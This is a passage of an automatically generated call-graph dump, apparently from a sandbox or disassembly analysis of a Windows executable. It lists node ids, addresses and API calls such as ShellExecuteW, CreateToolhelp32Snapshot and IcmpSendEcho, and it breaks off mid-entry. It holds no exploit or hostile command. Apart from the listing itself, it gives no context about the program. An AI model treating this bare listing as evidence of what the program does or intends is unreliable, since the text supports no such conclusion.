87f21b 102816 87f228 102815->102816 102822 87f1ce 102815->102822 102832 882b68 20 API calls _abort 102816->102832 102817 87f19f 102819 87f1bc 102817->102819 102817->102822 102831 87f3ff 31 API calls 4 library calls 102819->102831 102821 87f1c6 102824 87f104 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 102821->102824 102822->102824 102833 87f27b 30 API calls 2 library calls 102822->102833 102824->102799 102825->102800 102834 8895d6 102826->102834 102828 87f133 102828->102815 102828->102817 102828->102824 102829->102810 102830->102824 102831->102821 102832->102824 102833->102824 102835 8895e2 __FrameHandler3::FrameUnwindToState 102834->102835 102836 8895ea 102835->102836 102837 889602 102835->102837 102860 882b55 20 API calls _abort 102836->102860 102839 8896b6 102837->102839 102843 88963a 102837->102843 102865 882b55 20 API calls _abort 102839->102865 102840 8895ef 102861 882b68 20 API calls _abort 102840->102861 102859 885497 EnterCriticalSection 102843->102859 102844 8896bb 102866 882b68 20 API calls _abort 102844->102866 102847 889640 102849 889679 102847->102849 102850 889664 102847->102850 102848 8896c3 102867 882aac 26 API calls _strftime 102848->102867 102854 8896db __fread_nolock 28 API calls 102849->102854 102862 882b68 20 API calls _abort 102850->102862 102853 8895f7 __wsopen_s 102853->102828 102856 889674 102854->102856 102855 889669 102863 882b55 20 API calls _abort 102855->102863 102864 8896ae LeaveCriticalSection __wsopen_s 102856->102864 102859->102847 102860->102840 102861->102853 102862->102855 102863->102856 102864->102853 102865->102844 102866->102848 102867->102853 102868 87074b 102869 870757 __FrameHandler3::FrameUnwindToState 102868->102869 102897 870201 102869->102897 102871 87075e 102872 8708b1 102871->102872 102875 870788 102871->102875 102924 870b8f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 102872->102924 102874 8708b8 102925 8751a2 28 API calls _abort 102874->102925 102886 8707c7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 102875->102886 102908 88273d 102875->102908 102877 8708be 102926 875154 28 API calls _abort 102877->102926 102880 8708c6 102881 8707a7 102884 870828 102916 870ca9 102884->102916 102886->102884 102920 87516a 38 API calls 3 library calls 102886->102920 102888 87082e 102889 870843 102888->102889 102921 870ce2 GetModuleHandleW 102889->102921 102891 87084a 102891->102874 102892 87084e 102891->102892 102893 870857 102892->102893 102922 875145 28 API calls _abort 102892->102922 102923 870390 13 API calls 2 library calls 102893->102923 102896 87085f 102896->102881 102898 87020a 102897->102898 102927 8709e8 IsProcessorFeaturePresent 102898->102927 102900 870216 102928 872fe4 10 API calls 3 library calls 102900->102928 102902 87021b 102903 87021f 102902->102903 102929 8825d7 102902->102929 102903->102871 102906 870236 102906->102871 102910 882754 102908->102910 102909 870ddc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 102911 8707a1 102909->102911 102910->102909 102911->102881 102912 8826e1 102911->102912 102913 882710 102912->102913 102914 870ddc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 102913->102914 102915 882739 102914->102915 102915->102886 102997 872690 102916->102997 102919 870ccf 102919->102888 102920->102884 102921->102891 102922->102893 102923->102896 102924->102874 102925->102877 102926->102880 102927->102900 102928->102902 102933 88d547 102929->102933 102932 87300d 8 API calls 3 library calls 102932->102903 102934 88d560 102933->102934 102935 88d564 102933->102935 102951 870ddc 102934->102951 102935->102934 102939 884f4b 102935->102939 102937 870228 102937->102906 102937->102932 102940 884f57 __FrameHandler3::FrameUnwindToState 102939->102940 102958 8832ae EnterCriticalSection 102940->102958 102942 884f5e 102959 8853ff 102942->102959 102944 884f6d 102950 884f7c 102944->102950 102972 884ddf 29 API calls 102944->102972 102947 884f77 102973 884e95 GetStdHandle GetFileType 102947->102973 102948 884f8d __wsopen_s 102948->102935 102974 884f98 LeaveCriticalSection _abort 102950->102974 102952 870de7 IsProcessorFeaturePresent 102951->102952 102953 870de5 102951->102953 102955 870fad 102952->102955 102953->102937 102996 870f71 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 102955->102996 102957 871090 102957->102937 102958->102942 102960 88540b __FrameHandler3::FrameUnwindToState 102959->102960 102961 885418 102960->102961 102962 88542f 102960->102962 102983 882b68 20 API calls _abort 102961->102983 102975 8832ae EnterCriticalSection 102962->102975 102965 88541d 102984 882aac 26 API calls _strftime 102965->102984 102967 885427 __wsopen_s 102967->102944 102968 885467 102985 88548e LeaveCriticalSection _abort 102968->102985 102971 88543b 102971->102968 102976 885350 102971->102976 102972->102947 102973->102950 102974->102948 102975->102971 102986 884fcd 102976->102986 102978 88536f 102980 882d18 _free 20 API calls 102978->102980 102979 885362 102979->102978 102993 883755 11 API calls 2 library calls 102979->102993 102982 8853c1 102980->102982 102982->102971 102983->102965 102984->102967 102985->102967 102991 884fda _abort 102986->102991 102987 88501a 102995 882b68 20 API calls _abort 102987->102995 102988 885005 RtlAllocateHeap 102989 885018 102988->102989 102988->102991 102989->102979 102991->102987 102991->102988 102994 8751fd 7 API calls 2 library calls 102991->102994 102993->102979 102994->102991 102995->102989 102996->102957 102998 870cbc GetStartupInfoW 102997->102998 102998->102919 102999 8531c8 103000 8531d5 __wsopen_s 102999->103000 103001 893330 ___scrt_fastfail 103000->103001 103002 8531ee 103000->103002 103003 89334c GetOpenFileNameW 103001->103003 103013 85318a 103002->103013 103005 89339b 103003->103005 103007 857467 8 API calls 103005->103007 103008 8933b0 103007->103008 103008->103008 103010 85320c 103029 85515f 103010->103029 103057 8922a0 103013->103057 103016 857467 8 API calls 103017 8531bf 103016->103017 103018 853c2f 103017->103018 103019 85ae03 8 API calls 103018->103019 103020 853c41 103019->103020 103021 853c57 103020->103021 103022 893b44 103020->103022 103059 8558dc 103021->103059 103026 893b66 103022->103026 103071 86e224 41 API calls 103022->103071 103028 853c76 103028->103010 103072 8554de 103029->103072 103032 89436b 103181 8c33e2 47 API calls ___std_exception_copy 103032->103181 103033 8554de 61 API calls 103035 855198 103033->103035 103035->103032 103058 853197 GetLongPathNameW 103057->103058 103058->103016 103060 85590c __fread_nolock 103059->103060 103061 8558eb 103059->103061 103062 87012b 8 API calls 103060->103062 103064 87015b 8 API calls 103061->103064 103063 853c63 103062->103063 103065 8512f4 103063->103065 103064->103060 103066 851306 103065->103066 103070 851325 __fread_nolock 103065->103070 103068 87015b 8 API calls 103066->103068 103067 87012b 8 API calls 103069 85133c 103067->103069 103068->103070 103069->103028 103070->103067 103071->103022 103206 8554a3 LoadLibraryA 103072->103206 103077 894660 103079 85554c 34 API calls 103077->103079 103078 855509 LoadLibraryExW 103214 85546c LoadLibraryA 103078->103214 103081 894667 103079->103081 103084 85546c 3 API calls 103081->103084 103086 89466f 103084->103086 103085 855533 103085->103086 103087 85553f 103085->103087 103235 8556aa 103086->103235 103088 85554c 34 API calls 103087->103088 103090 855184 103088->103090 103090->103032 103090->103033 103093 894696 103207 8554d9 103206->103207 103208 8554bb GetProcAddress 103206->103208 103211 87e93b 103207->103211 103209 8554cb 103208->103209 103209->103207 103210 8554d2 FreeLibrary 103209->103210 103210->103207 103241 87e87a 103211->103241 103213 8554fd 103213->103077 103213->103078 103215 855481 GetProcAddress 103214->103215 103216 8554a0 103214->103216 103217 855491 103215->103217 103219 855580 103216->103219 103217->103216 103218 855499 FreeLibrary 103217->103218 103218->103216 103220 87015b 8 API calls 103219->103220 103221 855595 103220->103221 103293 853966 103221->103293 103223 8555a1 __fread_nolock 103224 8946da 103223->103224 103229 8555dc 103223->103229 103301 8c3738 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 103223->103301 103302 8c37bc 40 API calls 103224->103302 103227 8556aa 40 API calls 103227->103229 103228 855670 messages 103228->103085 103229->103227 103229->103228 103230 89471e 103229->103230 103296 8556d4 103229->103296 103232 8556d4 30 API calls 103230->103232 103233 89474d 103232->103233 103234 8556aa 40 API calls 103233->103234 103234->103228 103236 894778 103235->103236 103237 8556bc 103235->103237 103337 87ec14 103237->103337 103240 8c2fe7 27 API calls 103240->103093 103243 87e886 __FrameHandler3::FrameUnwindToState 103241->103243 103242 87e894 103266 882b68 20 API calls _abort 103242->103266 103243->103242 103246 87e8c4 103243->103246 103245 87e899 103267 882aac 26 API calls _strftime 103245->103267 103248 87e8d6 103246->103248 103249 87e8c9 103246->103249 103258 8883b1 103248->103258 103268 882b68 20 API calls _abort 103249->103268 103252 87e8df 103253 87e8e5 103252->103253 103254 87e8f2 103252->103254 103269 882b68 20 API calls _abort 103253->103269 103270 87e924 LeaveCriticalSection __fread_nolock 103254->103270 103256 87e8a4 __wsopen_s 103256->103213 103259 8883bd __FrameHandler3::FrameUnwindToState 103258->103259 103271 8832ae EnterCriticalSection 103259->103271 103261 8883cb 103272 88844b 103261->103272 103265 8883fc __wsopen_s 103265->103252 103266->103245 103267->103256 103268->103256 103269->103256 103270->103256 103271->103261 103273 88846e 103272->103273 103274 8884c7 103273->103274 103281 8883d8 103273->103281 103288 8794dd EnterCriticalSection 103273->103288 103289 8794f1 LeaveCriticalSection 103273->103289 103275 884fcd _abort 20 API calls 103274->103275 103276 8884d0 103275->103276 103278 882d18 _free 20 API calls 103276->103278 103279 8884d9 103278->103279 103279->103281 103290 883755 11 API calls 2 library calls 103279->103290 103285 888407 103281->103285 103282 8884f8 103291 8794dd EnterCriticalSection 103282->103291 103292 8832f6 LeaveCriticalSection 103285->103292 103287 88840e 103287->103265 103288->103273 103289->103273 103290->103282 103291->103281 103292->103287 103294 87012b 8 API calls 103293->103294 103295 853978 103294->103295 103295->103223 103297 8556e3 103296->103297 103299 894798 103296->103299 103303 87f033 103297->103303 103301->103224 103302->103229 103306 87edfa 103303->103306 103308 87ee06 __FrameHandler3::FrameUnwindToState 103306->103308 103307 87ee12 103329 882b68 20 API calls _abort 103307->103329 103308->103307 103309 87ee38 103308->103309 103319 8794dd EnterCriticalSection 103309->103319 103340 87ec31 103337->103340 103339 8556cd 103339->103240 103341 87ec3d __FrameHandler3::FrameUnwindToState 103340->103341 103342 87ec50 ___scrt_fastfail 103341->103342 103343 87ec7d 103341->103343 103344 87ec75 __wsopen_s 103341->103344 103367 882b68 20 API calls _abort 103342->103367 103353 8794dd EnterCriticalSection 103343->103353 103344->103339 103346 87ec87 103354 87ea48 103346->103354 103349 87ec6a 103368 882aac 26 API calls _strftime 103349->103368 103353->103346 103355 87ea5a ___scrt_fastfail 103354->103355 103360 87ea77 103354->103360 103356 87ea67 103355->103356 103355->103360 103365 87eaba __fread_nolock 103355->103365 103370 882b68 20 API calls _abort 103356->103370 103358 87ea6c 103369 87ecbc LeaveCriticalSection __fread_nolock 103360->103369 103361 87ebd6 ___scrt_fastfail 103373 882b68 20 API calls _abort 103361->103373 103363 87dca5 __fread_nolock 26 API calls 103363->103365 103365->103360 103365->103361 103365->103363 103366 889095 __fread_nolock 38 API calls 103365->103366 103372 87d2c8 26 API calls 4 library calls 103365->103372 103366->103365 103367->103349 103368->103344 103369->103344 103370->103358 103372->103365 103373->103358 103761 892f58 103762 85280d 103761->103762 103763 892f62 103761->103763 103789 85286b 7 API calls 103762->103789 103807 853dd1 103763->103807 103767 892f6b 103769 85a1d4 8 API calls 103767->103769 103771 892f79 103769->103771 103770 852817 103779 85282c 103770->103779 103793 853989 103770->103793 103772 892fa8 103771->103772 103773 892f81 103771->103773 103776 8559dc 8 API calls 103772->103776 103812 8559dc 103773->103812 103787 892fa4 GetForegroundWindow ShellExecuteW 103776->103787 103783 852847 103779->103783 103803 852f14 103779->103803 103780 856aa4 8 API calls 103782 892f9a 103780->103782 103785 8559dc 8 API calls 103782->103785 103786 85284e SetCurrentDirectoryW 103783->103786 103784 892fd9 103784->103783 103785->103787 103788 852862 103786->103788 103787->103784 103821 8529bc 7 API calls 103789->103821 103791 852812 103792 85294b CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103791->103792 103792->103770 103794 8539b4 ___scrt_fastfail 103793->103794 103822 854dd2 103794->103822 103797 853a3a 103799 8939c2 Shell_NotifyIconW 103797->103799 103800 853a58 Shell_NotifyIconW 103797->103800 103826 855033 103800->103826 103802 853a6e 103802->103779 103804 852f76 103803->103804 103805 852f26 ___scrt_fastfail 103803->103805 103804->103783 103806 852f45 Shell_NotifyIconW 103805->103806 103806->103804 103808 8922a0 __wsopen_s 103807->103808 103809 853dde GetModuleFileNameW 103808->103809 103810 85a1d4 8 API calls 103809->103810 103811 853e04 103810->103811 103811->103767 103813 8559f3 103812->103813 103814 894816 103812->103814 103865 855a04 103813->103865 103815 87012b 8 API calls 103814->103815 103818 894820 _wcslen 103815->103818 103817 8559fe 103817->103780 103819 87015b 8 API calls 103818->103819 103820 894859 __fread_nolock 103819->103820 103821->103791 103823 853a09 103822->103823 103824 854dee 103822->103824 103823->103797 103856 8bce59 42 API calls _strftime 103823->103856 103824->103823 103825 8940d9 DestroyIcon 103824->103825 103825->103823 103827 855050 103826->103827 103846 855132 103826->103846 103857 8569c4 103827->103857 103830 8942ad LoadStringW 103834 8942c7 103830->103834 103831 85506b 103832 857467 8 API calls 103831->103832 103833 855080 103832->103833 103835 85508d 103833->103835 103843 8942e3 103833->103843 103840 8550b3 ___scrt_fastfail 103834->103840 103862 85ad69 8 API calls __fread_nolock 103834->103862 103835->103834 103837 855097 103835->103837 103838 8559dc 8 API calls 103837->103838 103839 8550a5 103838->103839 103841 856aa4 8 API calls 103839->103841 103844 855118 Shell_NotifyIconW 103840->103844 103841->103840 103842 894326 103864 86fe35 39 API calls 103842->103864 103843->103840 103843->103842 103845 85ae03 8 API calls 103843->103845 103844->103846 103847 89430d 103845->103847 103846->103802 103863 8ba08a 9 API calls 103847->103863 103850 894345 103852 8559dc 8 API calls 103850->103852 103851 894318 103853 856aa4 8 API calls 103851->103853 103854 894356 103852->103854 103853->103842 103855 8559dc 8 API calls 103854->103855 103855->103840 103856->103797 103858 87015b 8 API calls 103857->103858 103859 8569e9 103858->103859 103860 87012b 8 API calls 103859->103860 103861 85505e 103860->103861 103861->103830 103861->103831 103862->103840 103863->103851 103864->103850 103866 855a14 _wcslen 103865->103866 103867 894878 103866->103867 103868 855a27 103866->103868 103869 87012b 8 API calls 103867->103869 103870 856c63 8 API calls 103868->103870 103871 894882 103869->103871 103872 855a34 __fread_nolock 103870->103872 103873 87015b 8 API calls 103871->103873 103872->103817 103874 8948b2 __fread_nolock 103873->103874 103875 8a2dd0 103889 85dd50 messages 103875->103889 103876 85e0b1 PeekMessageW 103876->103889 103877 85dda7 GetInputState 103877->103876 103877->103889 103879 8a2254 TranslateAcceleratorW 103879->103889 103880 85e113 TranslateMessage DispatchMessageW 103881 85e12f PeekMessageW 103880->103881 103881->103889 103882 85dfa4 timeGetTime 103882->103889 103883 85e14f Sleep 103905 85e160 103883->103905 103884 8a310a Sleep 103884->103905 103885 86ef0e timeGetTime 103885->103905 103886 8a2370 timeGetTime 104077 86a921 9 API calls 103886->104077 103889->103876 103889->103877 103889->103879 103889->103880 103889->103881 103889->103882 103889->103883 103889->103884 103889->103886 103894 85df75 103889->103894 103902 85f1e0 225 API calls 103889->103902 103907 85e2f0 103889->103907 103914 85e570 103889->103914 103937 8619c0 103889->103937 104006 85c210 103889->104006 104072 86f3b7 103889->104072 104078 8c4199 8 API calls 103889->104078 104079 8c3d0b 59 API calls __wsopen_s 103889->104079 103890 8a31a1 GetExitCodeProcess 103891 8a31cd CloseHandle 103890->103891 103892 8a31b7 WaitForSingleObject 103890->103892 103891->103905 103892->103889 103892->103891 103893 8a2fc7 103893->103894 103895 8e317d GetForegroundWindow 103895->103905 103897 8a323f Sleep 103897->103889 103902->103889 103905->103885 103905->103889 103905->103890 103905->103893 103905->103894 103905->103895 103905->103897 104080 8d5ddf 8 API calls 103905->104080 104081 8befbc QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103905->104081 104082 8bdac1 CreateToolhelp32Snapshot Process32FirstW 103905->104082 103908 85e323 103907->103908 103909 85e30f 103907->103909 104124 8c3d0b 59 API calls __wsopen_s 103908->104124 104092 85d7f0 103909->104092 103912 85e31a 103912->103889 103913 8a350b 103913->103913 103915 85e5b0 103914->103915 103926 85e67c messages 103915->103926 104143 870592 5 API calls __Init_thread_wait 103915->104143 103916 85f1e0 225 API calls 103916->103926 103919 8a3560 103922 85ae03 8 API calls 103919->103922 103919->103926 103920 85ae03 8 API calls 103920->103926 103921 8c3d0b 59 API calls 103921->103926 103923 8a357a 103922->103923 104144 8703f3 29 API calls __onexit 103923->104144 103926->103916 103926->103920 103926->103921 103932 860b40 8 API calls 103926->103932 103935 85e981 103926->103935 104140 85ad69 8 API calls __fread_nolock 103926->104140 104141 85acbd 39 API calls 103926->104141 104142 86b215 225 API calls 103926->104142 104146 870592 5 API calls __Init_thread_wait 103926->104146 104147 8703f3 29 API calls __onexit 103926->104147 104148 870548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103926->104148 104149 8d4f5b 103926->104149 104201 8d7048 225 API calls 103926->104201 103928 8a3584 104145 870548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103928->104145 103932->103926 103935->103889 103938 861a26 103937->103938 103939 861e60 103937->103939 103940 8a6b5f 103938->103940 103941 861a40 103938->103941 104564 870592 5 API calls __Init_thread_wait 103939->104564 103944 8a6b6b 103940->103944 104523 8d7823 103940->104523 103943 861fd0 9 API calls 103941->103943 103947 861a50 103943->103947 103944->103889 103946 861e6a 103948 861eab 103946->103948 103950 85a1d4 8 API calls 103946->103950 103949 861fd0 9 API calls 103947->103949 103952 8a6b74 103948->103952 103954 861edc 103948->103954 103951 861a66 103949->103951 103958 861e84 103950->103958 103951->103948 103953 861a9c 103951->103953 103982 8a6b97 103952->103982 104568 8c3d0b 59 API calls __wsopen_s 103952->104568 103953->103952 103977 861ab8 __fread_nolock 103953->103977 103955 85a35b 8 API calls 103954->103955 103957 861ee9 103955->103957 104566 86e5a1 225 API calls 103957->104566 104565 870548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103958->104565 103961 8a6b9c 104569 8c3d0b 59 API calls __wsopen_s 103961->104569 103962 861bdf 103964 8a6bff 103962->103964 103965 861bec 103962->103965 104571 8d5ecc 41 API calls _wcslen 103964->104571 103966 861fd0 9 API calls 103965->103966 103968 861bf9 103966->103968 103971 8a6d28 103968->103971 103974 861fd0 9 API calls 103968->103974 103969 87012b 8 API calls 103969->103977 103970 87015b 8 API calls 103970->103977 103971->103982 104573 8c3d0b 59 API calls __wsopen_s 103971->104573 103972 861f22 104567 86fdff 8 API calls 103972->104567 103978 861c13 103974->103978 103976 85f1e0 225 API calls 103976->103977 103977->103957 103977->103961 103977->103962 103977->103969 103977->103970 103977->103976 103979 8a6be0 103977->103979 103977->103982 103978->103971 103984 861c77 messages 103978->103984 104572 85ad69 8 API calls __fread_nolock 103978->104572 104570 8c3d0b 59 API calls __wsopen_s 103979->104570 103982->103889 103983 861fd0 9 API calls 103983->103984 103984->103971 103984->103972 103984->103982 103984->103983 103986 861d2b messages 103984->103986 103988 85abe7 8 API calls 103984->103988 104248 8da3d4 103984->104248 104256 8c63c9 103984->104256 104261 8d0ce2 103984->104261 104286 8d9d26 103984->104286 104289 8da2dc 103984->104289 104295 8c4924 103984->104295 104325 8c6376 103984->104325 104332 857b4a 103984->104332 104407 8be7da GetFileAttributesW 103984->104407 104409 86f7bc Sleep GlobalMemoryStatusEx 103984->104409 104428 8d9d12 103984->104428 104431 8cf674 103984->104431 104440 86aaf7 103984->104440 104459 8daa71 103984->104459 104464 8d43b7 VariantInit 103984->104464 104505 8d10b7 103984->104505 104518 8cdc6f 103984->104518 103985 861dcd 103985->103889 103986->103985 104563 86e1db 8 API calls messages 103986->104563 103988->103984 104046 85c26e 104006->104046 104888 85b080 9 API calls messages 104006->104888 104009 8a08ff 104009->103889 104011 8a0949 104020 8a0a09 104011->104020 104024 8a09ad 104011->104024 104035 8a0907 104011->104035 104012 8a0ab7 104015 85c3c5 104012->104015 104058 8a0a04 104012->104058 104898 8d5ecc 41 API calls _wcslen 104012->104898 104013 85c3b6 104013->104012 104013->104015 104896 8b7819 8 API calls __fread_nolock 104013->104896 104025 87012b 8 API calls 104015->104025 104034 85c443 104015->104034 104063 8a0f1b 104015->104063 104017 85cd46 104022 87015b 8 API calls 104017->104022 104019 8a0a66 104897 8b7792 8 API calls __fread_nolock 104019->104897 104894 8c3d0b 59 API calls __wsopen_s 104020->104894 104021 87012b 8 API calls 104021->104046 104032 85cd74 __fread_nolock 104022->104032 104892 86e5a1 225 API calls 104024->104892 104027 85c419 104025->104027 104027->104034 104889 85b1bd 8 API calls 104027->104889 104028 8a0ae8 104028->104015 104899 8b7819 8 API calls __fread_nolock 104028->104899 104029 8a0a90 104031 85f1e0 225 API calls 104029->104031 104031->104012 104037 87015b 8 API calls 104032->104037 104038 8a0ba2 104034->104038 104045 85c467 __fread_nolock messages 104034->104045 104900 85b23b 104034->104900 104035->104058 104893 8c3d0b 59 API calls __wsopen_s 104035->104893 104037->104045 104039 8a0bb3 104038->104039 104041 85b23b 8 API calls 104038->104041 104039->104045 104908 86b96b 8 API calls messages 104039->104908 104041->104039 104043 85f1e0 225 API calls 104043->104046 104045->104035 104047 8a0d46 104045->104047 104055 8a0d9b 104045->104055 104057 85be10 39 API calls 104045->104057 104059 87012b 8 API calls 104045->104059 104060 85a35b 8 API calls 104045->104060 104061 85b23b 8 API calls 104045->104061 104062 8a0f00 104045->104062 104045->104063 104065 85ad69 8 API calls 104045->104065 104066 87015b 8 API calls 104045->104066 104067 85caa9 104045->104067 104068 85cf90 104045->104068 104070 85c83c messages 104045->104070 104909 8bf69d 39 API calls 104045->104909 104910 85ae35 39 API calls 104045->104910 104913 8c3978 8 API calls 104045->104913 104046->104011 104046->104013 104046->104017 104046->104021 104046->104024 104046->104032 104046->104035 104046->104043 104046->104045 104048 8a0a2c 104046->104048 104046->104058 104046->104068 104050 85f1e0 225 API calls 104047->104050 104895 8c3d0b 59 API calls __wsopen_s 104048->104895 104051 8a0d70 104050->104051 104051->104058 104911 85acbd 39 API calls 104051->104911 104912 8c3d0b 59 API calls __wsopen_s 104055->104912 104057->104045 104059->104045 104060->104045 104061->104045 104914 8b5443 8 API calls messages 104062->104914 104063->104058 104915 8c3d0b 59 API calls __wsopen_s 104063->104915 104065->104045 104066->104045 104067->103889 104891 8c3d0b 59 API calls __wsopen_s 104068->104891 104069 85c853 104069->103889 104070->104069 104890 86e1c3 8 API calls messages 104070->104890 104073 86f3ca 104072->104073 104074 86f3d3 104072->104074 104073->103889 104074->104073 104075 86f3f7 IsDialogMessageW 104074->104075 104076 8af895 GetClassLongW 104074->104076 104075->104073 104075->104074 104076->104074 104076->104075 104077->103889 104078->103889 104079->103889 104080->103905 104081->103905 104917 8be538 104082->104917 104084 8bdb0e Process32NextW 104085 8bdbc0 FindCloseChangeNotification 104084->104085 104087 8bdb07 104084->104087 104085->103905 104086 85ae03 8 API calls 104086->104087 104087->104084 104087->104085 104087->104086 104088 85a1d4 8 API calls 104087->104088 104089 853e34 8 API calls 104087->104089 104090 856aa4 8 API calls 104087->104090 104921 86e224 41 API calls 104087->104921 104088->104087 104089->104087 104090->104087 104093 85f1e0 225 API calls 104092->104093 104109 85d82d 104093->104109 104094 8a215a 104138 8c3d0b 59 API calls __wsopen_s 104094->104138 104096 85d89b messages 104096->103912 104097 85d953 104099 85d95e 104097->104099 104100 85dc65 104097->104100 104098 85db8f 104101 8a214b 104098->104101 104102 85dba4 104098->104102 104104 87012b 8 API calls 104099->104104 104100->104096 104107 87015b 8 API calls 104100->104107 104137 8d5e8c 8 API calls 104101->104137 104106 87012b 8 API calls 104102->104106 104103 85da48 104108 87015b 8 API calls 104103->104108 104112 85d965 __fread_nolock 104104->104112 104118 85d9fa 104106->104118 104107->104112 104114 85d9b9 __fread_nolock messages 104108->104114 104109->104094 104109->104096 104109->104097 104109->104100 104109->104103 104113 87012b 8 API calls 104109->104113 104109->104114 104110 87012b 8 API calls 104111 85d986 104110->104111 104111->104114 104125 85c0f0 104111->104125 104112->104110 104112->104111 104113->104109 104114->104098 104116 8a213a 104114->104116 104114->104118 104120 8a2115 104114->104120 104122 8a20f3 104114->104122 104133 851c48 225 API calls 104114->104133 104136 8c3d0b 59 API calls __wsopen_s 104116->104136 104118->103912 104135 8c3d0b 59 API calls __wsopen_s 104120->104135 104134 8c3d0b 59 API calls __wsopen_s 104122->104134 104124->103913 104126 85c156 104125->104126 104127 85c12a 104125->104127 104129 85f1e0 225 API calls 104126->104129 104128 85e570 225 API calls 104127->104128 104131 85c130 104128->104131 104130 8a07d2 104129->104130 104130->104131 104139 8c3d0b 59 API calls __wsopen_s 104130->104139 104131->104114 104133->104114 104134->104118 104135->104118 104136->104118 104137->104094 104138->104096 104139->104131 104140->103926 104141->103926 104142->103926 104143->103919 104144->103928 104145->103926 104146->103926 104147->103926 104148->103926 104150 8d4fb1 104149->104150 104153 8d4f74 104149->104153 104150->104153 104202 8b67da VariantClear 104150->104202 104152 8d4fd1 104203 8b00d2 63 API calls 104152->104203 104153->103926 104155 8d4ff0 104156 85a1d4 8 API calls 104155->104156 104157 8d5009 104155->104157 104156->104157 104204 8578a5 104157->104204 104161 8d5143 GetLastError 104213 8b00d2 63 API calls 104161->104213 104162 8d5033 104162->104161 104164 86bb11 8 API calls 104162->104164 104171 8d5085 104162->104171 104166 8d5076 104164->104166 104165 86bb11 8 API calls 104168 8d50a0 104165->104168 104208 8b00d2 63 API calls 104166->104208 104209 8b00d2 63 API calls 104168->104209 104169 86bb11 8 API calls 104174 8d50ca 104169->104174 104171->104165 104175 8d50af 104171->104175 104172 8d5166 104214 8b00d2 63 API calls 104172->104214 104210 8b00d2 63 API calls 104174->104210 104175->104169 104177 8d50d9 104175->104177 104211 8b00d2 63 API calls 104177->104211 104179 8d5196 104182 8d51b8 104179->104182 104183 8d51a4 104179->104183 104180 8d5104 104212 8b00d2 63 API calls 104180->104212 104216 857e30 104182->104216 104215 8c1802 8 API calls 104183->104215 104184 8d513b 104184->104161 104187 8d51b0 104188 8d5215 VariantInit 104187->104188 104189 8d5251 104188->104189 104239 8b7792 8 API calls __fread_nolock 104189->104239 104191 8d526a 104240 8c13c8 60 API calls messages 104191->104240 104193 8d5285 104241 8ceb66 225 API calls 104193->104241 104195 8d52a6 104196 8d52c5 VariantClear 104195->104196 104242 8ceb66 225 API calls 104195->104242 104199 8d530b 104196->104199 104243 8b76c6 8 API calls 104199->104243 104201->103926 104202->104152 104203->104155 104205 87012b 8 API calls 104204->104205 104206 8578b3 104205->104206 104207 8b00d2 63 API calls 104206->104207 104207->104162 104208->104171 104209->104175 104210->104177 104211->104180 104212->104184 104213->104172 104214->104179 104215->104187 104217 857e45 104216->104217 104218 857e42 104216->104218 104219 857e4d 104217->104219 104220 857e7b 104217->104220 104218->104187 104244 875516 26 API calls 104219->104244 104222 895b50 104220->104222 104225 857e8d 104220->104225 104230 895a69 104220->104230 104247 8754d3 26 API calls 104222->104247 104223 857e5d 104229 87012b 8 API calls 104223->104229 104245 86fe35 39 API calls 104225->104245 104226 895b68 104226->104226 104231 857e67 104229->104231 104232 895ae2 104230->104232 104234 87015b 8 API calls 104230->104234 104233 85a1d4 8 API calls 104231->104233 104246 86fe35 39 API calls 104232->104246 104233->104218 104235 895ab2 104234->104235 104236 87012b 8 API calls 104235->104236 104237 895ad9 104236->104237 104238 85a1d4 8 API calls 104237->104238 104238->104232 104239->104191 104240->104193 104241->104195 104242->104196 104243->104153 104244->104223 104245->104223 104246->104222 104247->104226 104249 8da3ef 104248->104249 104251 8da42f 104248->104251 104249->103984 104250 8da44d 104250->104249 104252 85b81d 39 API calls 104250->104252 104254 8da4aa 104250->104254 104251->104250 104593 85b81d 104251->104593 104252->104254 104574 8c009c 104254->104574 104257 857e30 40 API calls 104256->104257 104258 8c63dc 104257->104258 104614 8be1ac GetFileAttributesW 104258->104614 104260 8c63e6 104260->103984 104262 8d0d0b 104261->104262 104263 8d0d39 WSAStartup 104262->104263 104264 85b81d 39 API calls 104262->104264 104265 8d0d7e 104263->104265 104285 8d0d4d messages 104263->104285 104267 8d0d26 104264->104267 104618 86c0af 104265->104618 104267->104263 104270 85b81d 39 API calls 104267->104270 104269 857e30 40 API calls 104271 8d0d93 104269->104271 104272 8d0d35 104270->104272 104623 86fac6 WideCharToMultiByte 104271->104623 104272->104263 104274 8d0d9f inet_addr gethostbyname 104275 8d0dbd IcmpCreateFile 104274->104275 104274->104285 104276 8d0dfd 104275->104276 104275->104285 104277 87015b 8 API calls 104276->104277 104278 8d0e16 104277->104278 104279 853966 8 API calls 104278->104279 104280 8d0e21 104279->104280 104281 8d0e2c IcmpSendEcho 104280->104281 104282 8d0e55 IcmpSendEcho 104280->104282 104283 8d0e76 104281->104283 104282->104283 104284 8d0f3c IcmpCloseHandle WSACleanup 104283->104284 104284->104285 104285->103984 104633 8d86e0 104286->104633 104288 8d9d36 104288->103984 104293 8da2ef 104289->104293 104290 857e30 40 API calls 104291 8da35c 104290->104291 104745 8c15d3 104291->104745 104293->104290 104294 8da2fe 104293->104294 104294->103984 104296 857e30 40 API calls 104295->104296 104297 8c494c 104296->104297 104298 85a1d4 8 API calls 104297->104298 104299 8c495a SetErrorMode 104298->104299 104300 8c4997 104299->104300 104303 8c4b06 104299->104303 104301 8be7da GetFileAttributesW 104300->104301 104302 8c49a0 104301->104302 104302->104303 104787 8bdd89 8 API calls 104302->104787 104305 8c4b47 SetErrorMode 104303->104305 104307 8c4b57 104305->104307 104306 8c49b1 104309 85b81d 39 API calls 104306->104309 104315 8c49e3 104306->104315 104307->103984 104311 